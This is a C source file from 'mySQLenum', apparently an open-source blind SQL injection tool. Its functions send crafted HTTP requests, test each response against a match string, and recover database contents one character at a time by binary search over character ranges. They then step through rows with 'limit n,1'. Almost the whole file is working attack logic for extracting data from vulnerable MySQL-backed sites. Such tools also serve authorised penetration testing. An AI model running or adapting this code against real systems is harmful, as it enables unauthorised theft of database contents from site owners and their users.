/*
 * mySQLenum
 *  
 * Copyright (C) 2009 Andrea Fabrizi <andrea.fabrizi@gmail.com>
 *  
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *  
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *  
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 *
 */
#include <stdio.h>
#include <sys/types.h> 
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <ctype.h>
#include "mysqlenum.h"

/*
 * Skip the current row enumeration with one CTRL+C hit
 * Exit with Two consecutive CTRL+C hits
 */
void interrupt_enumeration(void)
{
    if (interrupt)
    {
        fprintf(stdout, "\nbye.\n");
        exit(EXIT_SUCCESS);
    }
    interrupt = 1;
    usleep(500000);
}

/*
 * Make and HTTP request and match the response with match_string
 *
 * Returns:
 * OK: 1 (match)
 * KO: 0 (!match)
 */
int match_reponse(const char* http_req, struct configuration *conf)
{
    char *response;
        
    response = http_request(http_req, conf);
        
    if (conf->delay != 0) 
        usleep(conf->delay * 1000);
    
    if (response != NULL)
    {
        if (strcasestr(response, conf->matchstring) != NULL)
        {
            debug_msg(VERBOSE_LEVEL_2,"RESPONSE MATCH: true\n");
            free(response);
            return (conf->inversematch == NO) ? 1 : 0;
        }
        else
        {
            debug_msg(VERBOSE_LEVEL_2,"RESPONSE MATCH: false\n");
            free(response);
            return (conf->inversematch == NO) ? 0 : 1;
        }        
    }
    else
        exit(EXIT_FAILURE);
    
    return 0;
}

/*
 * Single character enumeration
 * Every time will be checked a smaller range of characters... until remain only a couple of characters to check.  
 * At this point each character will be checked individually.
 *
 * Returns:
 * OK: enumerated character
 * KO: 0
 * Interrupted: -1
 */
char enum_char(struct configuration *conf, const char* query, int pos, int start_char, int end_char)
{
    int res,
        med;
    char c,
         *http_req;

    /* Skip? */
    if (interrupt)
    {
        interrupt = 0;
        return -1;
    }
    
    /* If the range is reduced to only 2 chars
     * will be checked each char individually
     */
    if (end_char - start_char == 1)
    {
        spinner();
        http_req = build_injection_request (conf, query, pos, start_char, -1);
        res = match_reponse(http_req, conf);
        free(http_req);
        
        if (res)
            return start_char;
        else 
        {
            spinner();
            http_req = build_injection_request (conf, query, pos, end_char, -1);
            res = match_reponse(http_req, conf);
            free(http_req);
            if (res)
                return end_char;
            else 
                return 0;
        }
    
    }
    
    /* middle value of the range */
    med =  (end_char - start_char) / 2 + start_char;
    
    spinner();
    http_req = build_injection_request(conf, query, pos, start_char, med);
    res = match_reponse(http_req, conf);
    free(http_req);

    /* match the first range */
    if (res)
    {
        c = enum_char (conf, query, pos, start_char, med);
        return c;
    }
    
    /* match the second range */ 
    else
    {
        c = enum_char (conf, query, pos, med, end_char);
        return c;
    }
    
    return 0;
}

/*
 * SQL Query enumeration
 *
 * Returns:
 * OK: > 0
 * KO: 0
 */
int enum_query(struct configuration *conf, const char *query)
{
    int pos = 1,
        ret_val = 1;
    char c,
         *query_encoded;
    
    if (conf->encodestrings == YES)
        query_encoded = char_encode_strings(query, conf->encoding);
    else query_encoded = (char *)query;
    
    debug_msg(VERBOSE_LEVEL_1, "Encoded query: %s\n", query_encoded);
    fprintf(stdout, "  ");
                
    while (1)
    {
        c = enum_char(conf, query_encoded, pos, conf->charstart, conf->charend);

        /* character not found... */
        if (c == 0) 
        {
            if (!nospinner)    
                fprintf(stdout, "\033[1D");

            if (pos == 1)
                ret_val = 0;
            else    
                fprintf(stdout, " \n");
            
            break;
        }
        else
        
        /* skip request */
        if (c == -1)
        {
            fprintf(stdout, " Skipping...\n");
            break;
        }
        
        /* character found! */
        if (nospinner)
            fprintf(stdout, "%c", c);
        else 
            fprintf(stdout, "\033[1D%c ", c);
        
        fflush(stdout);
        pos++;
    }

    if (conf->encodestrings == YES)
        free(query_encoded);    
    
    return ret_val;
}

/*
 * All rows enumeration
 *
 * Returns:
 * OK: numbers of rows enumerated
 * KO: 0
 */
int enum_query_all_rows(struct configuration *conf)
{
    char *query_row;
    int count_rows = 0,
        ret_val;
    
    count_rows = conf->startrow;
    
    do
    {
        fprintf(stdout, " %d) ", count_rows + 1);
        asprintf(&query_row, "%s limit %d,1", conf->sqlquery, count_rows);
        ret_val = enum_query(conf, query_row);
        free(query_row);
        if (ret_val) count_rows++;
    } while (ret_val);
    
    fprintf(stdout,"---\n");
    
    return count_rows;
}
